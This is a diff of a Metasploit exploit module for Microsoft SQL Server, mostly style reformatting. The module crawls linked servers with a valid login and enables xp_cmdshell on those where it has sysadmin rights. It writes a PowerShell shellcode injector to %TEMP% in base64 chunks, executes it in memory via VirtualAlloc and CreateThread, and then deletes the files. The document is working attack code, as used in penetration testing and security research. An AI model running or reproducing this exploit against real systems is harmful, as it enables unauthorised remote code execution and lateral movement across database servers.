@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
@@ -12,61 +11,68 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Microsoft SQL Server Database Link Crawling Command Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution',
+        'Description' => %q{
           This module can be used to crawl MS SQL Server database links and deploy
-        Metasploit payloads through links configured with sysadmin privileges using a
-        valid SQL Server Login.
+          Metasploit payloads through links configured with sysadmin privileges using a
+          valid SQL Server Login.
 
           If you are attempting to obtain multiple reverse shells using this module we
-        recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
-        up a exploit/multi/handler to run in the background as a job to support multiple incoming
-        shells.
+          recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
+          up a exploit/multi/handler to run in the background as a job to support multiple incoming
+          shells.
 
           If you are interested in deploying payloads to specific servers this module also
-        supports that functionality via the "DEPLOYLIST" option.
+          supports that functionality via the "DEPLOYLIST" option.
 
           Currently, the module is capable of delivering payloads to both 32bit and 64bit
-        Windows systems via powershell memory injection methods based on Matthew Graeber's
-        work. As a result, the target server must have powershell installed. By default,
-        all of the crawl information is saved to a CSV formatted log file and MSF loot so
-        that the tool can also be used for auditing without deploying payloads.
-      },
-      'Author'         =>
-        [
+          Windows systems via powershell memory injection methods based on Matthew Graeber's
+          work. As a result, the target server must have powershell installed. By default,
+          all of the crawl information is saved to a CSV formatted log file and MSF loot so
+          that the tool can also be used for auditing without deploying payloads.
+        },
+        'Author' => [
           'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
           'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
         ],
-      'Platform'      => [ 'win' ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'Platform' => [ 'win' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
-          ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
-          ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
+          ['URL', 'http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
+          ['URL', 'http://www.exploit-monday.com/2011_10_16_archive.html']
         ],
-      'DisclosureDate' => '2000-01-01',
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
+        'DisclosureDate' => '2000-01-01',
+        'Targets' => [
+          [ 'Automatic', {} ],
         ],
-      'CmdStagerFlavor' => 'vbs',
-      'DefaultTarget'  => 0
-    ))
+        'CmdStagerFlavor' => 'vbs',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
-        OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', false]),
-        OptString.new('DEPLOYLIST', [false,'Comma separated list of systems to deploy to']),
-        OptString.new('PASSWORD',   [true, 'The password for the specified username'])
-      ])
+        OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]),
+        OptString.new('DEPLOYLIST', [false, 'Comma separated list of systems to deploy to']),
+        OptString.new('PASSWORD', [true, 'The password for the specified username'])
+      ]
+    )
 
     register_advanced_options(
       [
         OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -109,39 +115,39 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Create loot table to store configuration information from crawled database server links
     linked_server_table = Rex::Text::Table.new(
-      'Header'  => 'Linked Server Table',
-      'Indent'   => 1,
-      'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
+      'Header' => 'Linked Server Table',
+      'Indent' => 1,
+      'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os', 'link_state']
     )
     save_loot = ""
 
     # Start crawling through linked database servers
-    while masterList.any? {|f| f["done"] == 0}
+    while masterList.any? { |f| f["done"] == 0 }
       # Find the first DB server that has not been crawled (not marked as done)
-      server = masterList.detect {|f| f["done"] == 0}
+      server = masterList.detect { |f| f["done"] == 0 }
 
       # Get configuration information from the database server
-      sql = query_builder(server["path"].first,"",0,versionQuery)
+      sql = query_builder(server["path"].first, "", 0, versionQuery)
       result = mssql_query(sql, false) if mssql_login_datastore
       parse_results = result[:rows]
       parse_results.each { |s|
         server["name"] = s[0]
         server["db_user"] = s[1]
         server["db_sysadmin"] = s[5]
-        server["db_version"] =  s[3]
+        server["db_version"] = s[3]
         server["db_os"] = s[4]
         server["numlinks"] = s[6]
       }
       if masterList.length == 1
         print_good("Successfully connected to #{server["name"]}")
         if datastore['VERBOSE']
-          show_configs(server["name"],parse_results,true)
+          show_configs(server["name"], parse_results, true)
         elsif server["db_sysadmin"] == 1
           print_good("Sysadmin on #{server["name"]}")
         end
       end
       if server["db_sysadmin"] == 1
-        enable_xp_cmdshell(server["path"].first,server["name"],shelled)
+        enable_xp_cmdshell(server["path"].first, server["name"], shelled)
       end
 
       # If links were found, determine if they can be connected to and add to crawl list
@@ -157,19 +163,18 @@ class MetasploitModule < Msf::Exploit::Remote
         print_status("Links found: #{server["numlinks"]}")
         print_status("-------------------------------------------------")
         execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'"
-        sql = query_builder(server["path"].first,"",0,execute)
+        sql = query_builder(server["path"].first, "", 0, execute)
         result = mssql_query(sql, false) if mssql_login_datastore
 
-        result[:rows].each {|name|
-          name.each {|name|
-
+        result[:rows].each { |name|
+          name.each { |name|
             # Check if link works and if sysadmin permissions - temp array to save orig server[path]
             temppath = Array.new
             temppath = server["path"].first.dup
             temppath << name
 
             # Get configuration information from the linked server
-            sql = query_builder(temppath,"",0,versionQuery)
+            sql = query_builder(temppath, "", 0, versionQuery)
             result = mssql_query(sql, false) if mssql_login_datastore
 
             # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
@@ -179,11 +184,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
               # Add link server information to loot
               link_status = 'up'
-              write_to_report(name,server,parse_results,linked_server_table,link_status)
+              write_to_report(name, server, parse_results, linked_server_table, link_status)
 
               # Display link server information in verbose mode
               if datastore['VERBOSE']
-                show_configs(name,parse_results)
+                show_configs(name, parse_results)
                 print_status("  o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
               else
                 if parse_results[0][5] == 1
@@ -194,16 +199,16 @@ class MetasploitModule < Msf::Exploit::Remote
               end
 
               # Add link to masterlist hash
-              unless masterList.any? {|f| f["name"] == name}
-                masterList << add_host(name,server["path"].first,parse_results)
+              unless masterList.any? { |f| f["name"] == name }
+                masterList << add_host(name, server["path"].first, parse_results)
               else
-                (0..masterList.length-1).each do |x|
+                (0..masterList.length - 1).each do |x|
                   if masterList[x]["name"] == name
                     masterList[x]["path"] << server["path"].first.dup
                     masterList[x]["path"].last << name
                     unless shelled.include?(name)
-                      if parse_results[0][2]==1
-                        enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
+                      if parse_results[0][2] == 1
+                        enable_xp_cmdshell(masterList[x]["path"].last.dup, name, shelled)
                       end
                     end
                   else
@@ -213,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
               end
             else
               # Add to report
-              linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']
+              linked_server_table << [server["name"], server["db_version"], server["db_os"], name, 'NA', 'NA', 'NA', 'NA', 'Connection Failed']
 
               # Display status to user
               if datastore['VERBOSE']
@@ -232,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       end
       # Set server to "crawled"
-      server["done"]=1
+      server["done"] = 1
     end
 
     print_status("-------------------------------------------------")
@@ -241,8 +246,8 @@ class MetasploitModule < Msf::Exploit::Remote
     this_service = nil
     if framework.db and framework.db.active
       this_service = report_service(
-        :host  => rhost,
-        :port => rport,
+        :host => mssql_client.peerhost,
+        :port => mssql_client.peerport,
         :name => 'mssql',
         :proto => 'tcp'
       )
@@ -254,9 +259,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("-------------------------------------------------")
 
     # Write log to loot / file
-    if (save_loot=="yes")
-      filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
-      path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
+    if (save_loot == "yes")
+      filename = "#{mssql_client.peerhost}-#{mssql_client.peerport}_linked_servers.csv"
+      path = store_loot("crawled_links", "text/plain", mssql_client.peerhost, linked_server_table.to_csv, filename, "Linked servers", this_service)
       print_good("Results have been saved to: #{path}")
     end
   end
@@ -264,19 +269,18 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method that builds nested openquery statements using during crawling
   # ---------------------------------------------------------------------
-  def query_builder(path,sql,ticks,execute)
-
+  def query_builder(path, sql, ticks, execute)
     # Temp used to maintain the original masterList[x]["path"]
     temp = Array.new
-    path.each {|i| temp << i}
+    path.each { |i| temp << i }
 
     # Actual query - defined when the function originally called - ticks multiplied
     if path.length == 0
-      return execute.gsub("'","'"*2**ticks)
+      return execute.gsub("'", "'" * 2**ticks)
 
     # openquery generator
     else
-      sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
+      sql = "select * from openquery(\"" + temp.shift + "\"," + "'" * 2**ticks + query_builder(temp, sql, ticks + 1, execute) + "'" * 2**ticks + ")"
       return sql
     end
   end
@@ -284,21 +288,20 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method that builds nested openquery statements using during crawling
   # ---------------------------------------------------------------------
-  def query_builder_rpc(path,sql,ticks,execute)
-
+  def query_builder_rpc(path, sql, ticks, execute)
     # Temp used to maintain the original masterList[x]["path"]
     temp = Array.new
-    path.each {|i| temp << i}
+    path.each { |i| temp << i }
 
     # Actual query - defined when the function originally called - ticks multiplied
     if path.length == 0
-      return execute.gsub("'","'"*2**ticks)
+      return execute.gsub("'", "'" * 2**ticks)
 
     # Openquery generator
     else
       exec_at = temp.shift
-      quotes = "'"*2**ticks
-      sql = "exec(#{quotes}#{query_builder_rpc(temp, sql,ticks + 1, execute)}#{quotes}) at [#{exec_at}]"
+      quotes = "'" * 2**ticks
+      sql = "exec(#{quotes}#{query_builder_rpc(temp, sql, ticks + 1, execute)}#{quotes}) at [#{exec_at}]"
       return sql
     end
   end
@@ -306,20 +309,19 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method for adding new linked database servers to the crawl list
   # ---------------------------------------------------------------------
-  def add_host(name,path,parse_results)
-
+  def add_host(name, path, parse_results)
     # Used to add new servers to masterList
     server = Hash.new
     server["name"] = name
     temppath = Array.new
-    path.each {|i| temppath << i }
+    path.each { |i| temppath << i }
     server["path"] = [temppath]
     server["path"].first << name
     server["done"] = 0
-    parse_results.each {|stuff|
+    parse_results.each { |stuff|
       server["db_user"] = stuff.at(1)
       server["db_sysadmin"] = stuff.at(2)
-      server["db_version"] =  stuff.at(3)
+      server["db_version"] = stuff.at(3)
       server["db_os"] = stuff.at(4)
       server["numlinks"] = stuff.at(6)
     }
@@ -329,11 +331,9 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method to display configuration information
   # ---------------------------------------------------------------------
-  def show_configs(i,parse_results,entry=false)
-
+  def show_configs(i, parse_results, entry = false)
     print_status(" ")
-    parse_results.each {|stuff|
-
+    parse_results.each { |stuff|
       # Translate syadmin code
       status = stuff.at(5)
       if status == 1 then
@@ -364,16 +364,16 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method for generating the report and loot
   # ---------------------------------------------------------------------
-  def write_to_report(i,server,parse_results,linked_server_table,link_status)
-    parse_results.each {|stuff|
+  def write_to_report(i, server, parse_results, linked_server_table, link_status)
+    parse_results.each { |stuff|
       # Parse server information
       db_link_user = stuff.at(1)
       db_link_sysadmin = stuff.at(2)
-      db_link_version =  stuff.at(3)
+      db_link_version = stuff.at(3)
       db_link_os = stuff.at(4)
 
       # Add link server to the reporting array and set link_status to 'up'
-      linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]
+      linked_server_table << [server["name"], server["db_version"], server["db_os"], i, db_link_user, db_link_sysadmin, db_link_version, db_link_os, link_status]
 
       return linked_server_table
     }
@@ -382,7 +382,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # ---------------------------------------------------------------------
   # Method for enabling xp_cmdshell
   # ---------------------------------------------------------------------
-  def enable_xp_cmdshell(path,name,shelled)
+  def enable_xp_cmdshell(path, name, shelled)
     # Enables "show advanced options" and xp_cmdshell if needed and possible
     # They cannot be enabled in user transactions (i.e. via openquery)
     # Only enabled if RPC_Out is enabled for linked server
@@ -390,13 +390,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Check if "show advanced options" is enabled
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'show advanced options'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
     result = mssql_query(sql, false) if mssql_login_datastore
     saoOrig = result[:rows].pop.pop
 
     # Check if "xp_cmdshell" is enabled
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
     result = mssql_query(sql, false) if mssql_login_datastore
     xpcmdOrig = result[:rows].pop.pop
 
@@ -408,20 +408,20 @@ class MetasploitModule < Msf::Exploit::Remote
       if saoOrig == 0
         # Enabling show advanced options and xp_cmdshell
         execute = "sp_configure 'show advanced options',1;reconfigure"
-        sql = query_builder_rpc(path,"",0,execute)
+        sql = query_builder_rpc(path, "", 0, execute)
         result = mssql_query(sql, false) if mssql_login_datastore
       end
 
       # Enabling xp_cmdshell
       print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
       execute = "sp_configure 'xp_cmdshell',1;reconfigure"
-      sql = query_builder_rpc(path,"",0,execute)
+      sql = query_builder_rpc(path, "", 0, execute)
       result = mssql_query(sql, false) if mssql_login_datastore
     end
 
     # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
     execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
     result = mssql_query(sql, false) if mssql_login_datastore
     xpcmdNow = result[:rows].pop.pop
 
@@ -429,7 +429,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
       if datastore['DEPLOY']
         print_status("Ready to deploy a payload #{name}")
-        if datastore['DEPLOYLIST']==""
+        if datastore['DEPLOYLIST'] == ""
           datastore['DEPLOYLIST'] = nil
         end
         if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"]
@@ -460,12 +460,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if xpcmdOrig == 0 and xpcmdNow == 1
       print_status("\t - Disabling xp_cmdshell on " + name)
       execute = "sp_configure 'xp_cmdshell',0;reconfigure"
-      sql = query_builder_rpc(path,"",0,execute)
+      sql = query_builder_rpc(path, "", 0, execute)
       result = mssql_query(sql, false) if mssql_login_datastore
     end
     if saoOrig == 0 and xpcmdNow == 1
       execute = "sp_configure 'show advanced options',0;reconfigure"
-      sql = query_builder_rpc(path,"",0,execute)
+      sql = query_builder_rpc(path, "", 0, execute)
       result = mssql_query(sql, false) if mssql_login_datastore
     end
   end
@@ -474,9 +474,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Method that delivers shellcode payload via powershell thread injection
   # ----------------------------------------------------------------------
   def powershell_upload_exec(path)
-
     # Create powershell script that will inject shell code from the selected payload
-    myscript ="$code = @\"
+    myscript = "$code = @\"
 [DllImport(\"kernel32.dll\")]
 public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 [DllImport(\"kernel32.dll\")]
@@ -485,7 +484,7 @@ public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStack
 public static extern IntPtr memset(IntPtr dest, uint src, uint count);
 \"@
 $winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
-[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
+[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\', ',0').sub(',', '')}
 $size = 0x1000
 if ($sc.Length -gt 0x1000) {$size = $sc.Length}
 $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
@@ -508,26 +507,26 @@ $winFunc::CreateThread(0,0,$x,0,0,0)"
     # queries could be found and removed.
     print_status("Deploying payload...")
     linenum = 0
-    mytext_64.scan(/.{1,2500}/).each {|part|
+    mytext_64.scan(/.{1,2500}/).each { |part|
       execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
-      sql = query_builder(path,"",0,execute)
+      sql = query_builder(path, "", 0, execute)
       result = mssql_query(sql, false) if mssql_login_datastore
-      linenum = linenum+1
+      linenum = linenum + 1
     }
 
     # Remove duplicate lines from temp file and write to new file
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
     result = mssql_query(sql, false) if mssql_login_datastore
 
     # Remove tracking tags from lines
     execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
     result = mssql_query(sql, false) if mssql_login_datastore
 
     # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
     # If running on 64bit system, 32bit powershell called from syswow64
-    powershell_cmd =  "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
+    powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
     '*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
     -noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
     powershell_uni = Rex::Text.to_unicode(powershell_cmd)
@@ -535,14 +534,14 @@ $winFunc::CreateThread(0,0,$x,0,0,0)"
 
     # Setup query
     execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
-    sql = query_builder(path,"",0,execute)
+    sql = query_builder(path, "", 0, execute)
 
     # Execute the playload
     print_status("Executing payload...")
     result = mssql_query(sql, false) if mssql_login_datastore
     # Remove payload data from the target server
     execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
-    sql = query_builder(path,"",0,execute)
-    result = mssql_query(sql,false)
+    sql = query_builder(path, "", 0, execute)
+    result = mssql_query(sql, false)
   end
 end
